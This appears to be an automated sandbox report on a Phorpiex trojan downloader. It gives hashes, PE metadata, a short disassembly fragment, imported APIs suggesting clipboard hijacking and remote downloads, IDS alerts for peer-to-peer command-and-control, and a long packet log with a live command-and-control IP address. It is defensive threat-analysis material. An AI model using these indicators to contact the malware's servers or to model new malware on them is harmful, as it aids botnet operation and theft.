                                                                              Entropy (8bit):6.233380923101525
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                                              File size:100'864 bytes
                                                                              MD5:0a547347b0b9af0290b263dfa8d71ebe
                                                                              SHA1:5ff176bfe5e0255a68c8e3d132afbff795a1fc1d
                                                                              SHA256:b00aa26d9d7889613c7552ce6e17b0264788e24c6166edcf68c47f209ca767f8
                                                                              SHA512:8e3795bc46783f970c63c56d340e1eb47346bd3e7a9050ed7d1fac77cdcf96e9ec2a955d56b60ca68556a160ab4c0116b2a51d0bbee91c5ded72a3b2b81d5fb0
                                                                              SSDEEP:1536:79H3LJvFmav82tiLZoS/0XOD7fiq4kzNEAAkHK:hHbCOqb/+i7fRekHK
                                                                              TLSH:ADA375839461B47FEFE98AB991F18E68542CBB75138848E391502657C7243FFFCB9026
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9...............
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x407500
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x663230CC [Wed May 1 12:08:44 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:2e23372b9869b74c90162a6fda4f170d
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              sub esp, 00000FF0h
                                                                              push 000007D0h
                                                                              call dword ptr [0041013Ch]
                                                                              push 0041431Ch
                                                                              push 00000000h
                                                                              push 00000000h
                                                                              call dword ptr [00410098h]
                                                                              mov dword ptr [ebp-00000E5Ch], eax
                                                                              call dword ptr [0041009Ch]
                                                                              cmp eax, 000000B7h
                                                                              jne 00007FD23523C9CAh
                                                                              push 00000000h
                                                                              call dword ptr [004100A0h]
                                                                              mov dword ptr [ebp-0000062Ch], 00000000h
                                                                              mov dword ptr [ebp-0000041Ch], 00000000h
                                                                              mov dword ptr [ebp-0000083Ch], 00000001h
                                                                              mov dword ptr [ebp-00000210h], 00000004h
                                                                              push 00000105h
                                                                              push 0041AA40h
                                                                              push 00000000h
                                                                              call dword ptr [004100B0h]
                                                                              push 0041AA40h
                                                                              call dword ptr [0041017Ch]
                                                                              mov dword ptr [ebp-0000020Ch], eax
                                                                              push 0041AA40h
                                                                              push 004112D8h
                                                                              lea eax, dword ptr [ebp-00000208h]
                                                                              push eax
                                                                              call dword ptr [0041019Ch]
                                                                              add esp, 0Ch
                                                                              lea ecx, dword ptr [ebp-00000208h]
                                                                              push ecx
                                                                              call dword ptr [004100C0h]
                                                                              push 00000104h
                                                                              lea edx, dword ptr [ebp-00000E58h]
                                                                              push edx
                                                                              push 00411300h
                                                                              call dword ptr [004100A4h]
                                                                              Programming Language:
                                                                              • [ C ] VS2005 build 50727
                                                                              • [IMP] VS2005 build 50727
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [C++] VS2008 SP1 build 30729
                                                                              • [LNK] VS2008 SP1 build 30729
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x1296c         | 0x104        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x10000         | 0x320        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy           | Characteristics
.text  | 0x1000          | 0xe7ca       | 0xe800   | 1aca5c8a58cabff1a9ac7bde70c48075 | False    | 0.46853111530172414 | data      | 6.132634994891317 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x10000         | 0x393a       | 0x3a00   | 549718be2c57075c01e894ac5660f4c2 | False    | 0.44396551724137934 | data      | 5.481279103860119 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x14000         | 0x7700       | 0x6400   | e9d1d3f5f7e251daf64080999c1d6da7 | False    | 0.121640625         | data      | 3.791264499968801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL          | Imports
WS2_32.dll   | gethostname, recvfrom, setsockopt, closesocket, htons, shutdown, WSAStartup, connect, WSAWaitForMultipleEvents, listen, WSASocketA, WSACreateEvent, WSAGetOverlappedResult, WSAEventSelect, WSAEnumNetworkEvents, WSAGetLastError, WSASend, WSARecv, WSACloseEvent, accept, getpeername, getsockname, inet_addr, gethostbyname, inet_ntoa, socket, bind, sendto, ioctlsocket, recv, send
SHLWAPI.dll  | StrStrIA, StrCmpNW, StrStrW, PathFileExistsW, StrChrA, PathFindFileNameW, StrCmpNIA, PathMatchSpecW
urlmon.dll   | URLDownloadToFileW
WININET.dll  | HttpOpenRequestA, HttpSendRequestA, InternetConnectA, InternetCloseHandle, DeleteUrlCacheEntry, InternetReadFile, InternetOpenA, InternetCrackUrlA, HttpAddRequestHeadersA, HttpQueryInfoA, InternetOpenUrlA, DeleteUrlCacheEntryW, InternetOpenUrlW, InternetOpenW
ntdll.dll    | strlen, isdigit, isalpha, memcpy, memset, NtQueryVirtualMemory, RtlUnwind, _chkstk, _aulldiv, wcslen, wcscmp, _allshl, _aullshr, strstr, strcmp, memmove, memcmp, RtlTimeToSecondsSince1980, NtQuerySystemTime, mbstowcs
msvcrt.dll   | srand, rand, _vscprintf
KERNEL32.dll | GetQueuedCompletionStatus, PostQueuedCompletionStatus, GetSystemInfo, lstrcmpW, SetEvent, CreateProcessW, GetLocaleInfoA, DeleteCriticalSection, GetCurrentThread, GetThreadPriority, SetThreadPriority, GetCurrentProcess, DuplicateHandle, IsBadReadPtr, InterlockedExchangeAdd, InterlockedIncrement, WaitForSingleObject, InterlockedDecrement, InterlockedExchange, HeapFree, HeapValidate, HeapReAlloc, GetProcessHeaps, HeapCreate, HeapSetInformation, GetCurrentProcessId, HeapAlloc, CreateMutexA, GetLastError, ExitProcess, ExpandEnvironmentStringsW, CreateEventA, CreateThread, GetModuleFileNameW, GetVolumeInformationW, GetDiskFreeSpaceExW, SetFileAttributesW, DeleteFileW, CopyFileW, lstrcmpiW, CreateDirectoryW, FindFirstFileW, CreateIoCompletionPort, MoveFileExW, FindNextFileW, FindClose, RemoveDirectoryW, GetLogicalDrives, GetDriveTypeW, QueryDosDeviceW, lstrcpyW, WriteFile, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, CreateFileW, CreateFileMappingW, MapViewOfFile, GlobalUnlock, GlobalLock, GlobalAlloc, lstrlenA, lstrlenW, lstrcpynW, MultiByteToWideChar, ExitThread, GetTickCount, Sleep, GetModuleHandleW, CloseHandle, UnmapViewOfFile, GetFileSize
USER32.dll   | RegisterClassExW, CreateWindowExW, GetMessageA, TranslateMessage, wsprintfW, DefWindowProcA, ChangeClipboardChain, RegisterRawInputDevices, GetClipboardData, DispatchMessageA, EmptyClipboard, SetClipboardData, CloseClipboard, IsClipboardFormatAvailable, SendMessageA, SetWindowLongW, SetClipboardViewer, GetWindowLongW, wsprintfA, wvsprintfA, OpenClipboard
ADVAPI32.dll | CryptReleaseContext, RegQueryValueExW, RegOpenKeyExW, RegOpenKeyExA, RegCreateKeyExW, CryptAcquireContextW, CryptGenRandom, RegCloseKey, RegSetValueExW, RegSetValueExA
SHELL32.dll  | ShellExecuteW
ole32.dll    | CoInitializeEx, CoUninitialize, CoInitialize, CoCreateInstance
OLEAUT32.dll | SysFreeString, SysAllocString
Timestamp                | Protocol | SID     | Message                                                                      | Source Port | Dest Port | Source IP      | Dest IP
05/08/24-15:22:40.436270 | UDP      | 2044077 | ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC                                | 53100       | 40500     | 192.168.2.8    | 100.82.121.252
05/08/24-15:22:45.471815 | TCP      | 2837677 | ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 80          | 49713     | 185.215.113.66 | 192.168.2.8
05/08/24-15:22:46.732432 | TCP      | 2837677 | ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 80          | 49715     | 185.215.113.66 | 192.168.2.8
05/08/24-15:22:49.024024 | TCP      | 2837677 | ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 80          | 49717     | 185.215.113.66 | 192.168.2.8
05/08/24-15:22:48.428846 | TCP      | 2837677 | ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 80          | 49716     | 185.215.113.66 | 192.168.2.8
05/08/24-15:22:30.416735 | UDP      | 2044077 | ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC                                | 53100       | 40500     | 192.168.2.8    | 189.222.182.86
05/08/24-15:22:35.420978 | UDP      | 2044077 | ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC                                | 53100       | 40500     | 192.168.2.8    | 2.133.220.58
05/08/24-15:22:25.401623 | UDP      | 2044077 | ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC                                | 53100       | 40500     | 192.168.2.8    | 10.102.10.21
                                                                              May 8, 2024 15:22:22.170066118 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170080900 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170131922 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170131922 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170605898 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170619965 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170633078 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170659065 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170695066 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170789003 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170803070 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170814991 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170828104 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170840979 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170855045 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170865059 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170865059 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170877934 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170891047 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170902967 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170934916 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170943975 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.170969009 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170983076 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.170989990 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.171062946 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.512552977 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512574911 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512587070 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512605906 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512676954 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512687922 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.512742996 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.512876034 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512913942 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.512921095 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.512955904 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513283968 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513298988 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513323069 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513334990 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513386965 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513420105 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513520002 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513535976 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513559103 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513572931 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513617992 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513631105 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513653040 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513658047 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513674021 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513698101 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513726950 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513746977 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513758898 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513761044 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513772964 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513781071 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513789892 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513793945 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513809919 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513822079 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513824940 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513859987 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513922930 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513936996 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.513956070 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513969898 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.513997078 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514035940 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514043093 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514075994 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514180899 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514215946 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514225960 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514240026 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514257908 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514270067 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514374018 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514388084 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514400959 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514408112 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514415979 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514422894 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514439106 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514452934 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514462948 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514497042 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514569998 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514584064 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514599085 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514607906 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514622927 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514636993 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514720917 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514734030 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514745951 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514756918 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514763117 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.514774084 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514787912 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.514802933 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.855673075 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855699062 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855714083 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855762005 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.855832100 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.855885983 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855902910 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855915070 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.855937004 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.855957985 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.856414080 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.856427908 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.856440067 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:22.856467962 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.856488943 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:22.965038061 CEST4970940500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:22:26.980781078 CEST4970940500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:22:29.232702017 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:29.575280905 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.659881115 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660027981 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660134077 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660188913 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660203934 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660233021 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660233021 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660259008 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660425901 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660485029 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660640955 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660691977 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660703897 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660706997 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.660728931 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.660763025 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.661111116 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.661156893 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.661576033 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.661668062 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:33.661694050 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:33.661744118 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:34.003422976 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:34.003463984 CEST8049710185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:34.003516912 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:34.003596067 CEST4971080192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:34.669456005 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:34.996299982 CEST4970940500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:22:35.018372059 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.018501043 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.021296024 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386163950 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386194944 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386343956 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386348963 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386382103 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386398077 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386421919 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386456966 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386580944 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386626005 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386668921 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386683941 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386698008 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386710882 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386713028 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386729002 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.386732101 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386754036 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.386775970 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:35.795547962 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.795568943 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:35.795717001 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.432187080 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773061991 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773205042 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773298979 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773305893 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773320913 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773336887 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773375988 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773400068 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773432970 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773448944 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773482084 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773499012 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773643970 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773658991 CEST8049712185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:43.773690939 CEST4971280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:43.773703098 CEST4971280192.168.2.8185.215.113.66
Timestamp                            Src Port  Dst Port  Source IP        Dest IP
May 8, 2024 15:22:43.773744106 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:43.773758888 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:43.773796082 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:43.773808002 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:43.774106979 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:43.774133921 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:44.117383957 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:44.117408991 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:44.117445946 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:44.117479086 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:44.117602110 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:44.117616892 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:44.117645979 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:44.117657900 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:44.117734909 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:44.117748976 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:44.117763042 CEST  80        49712     185.215.113.66   192.168.2.8
May 8, 2024 15:22:44.117774010 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:44.117789030 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:44.117799044 CEST  49712     80        192.168.2.8      185.215.113.66
May 8, 2024 15:22:44.117880106 CEST  80        49712     185.215.113.66   192.168.2.8
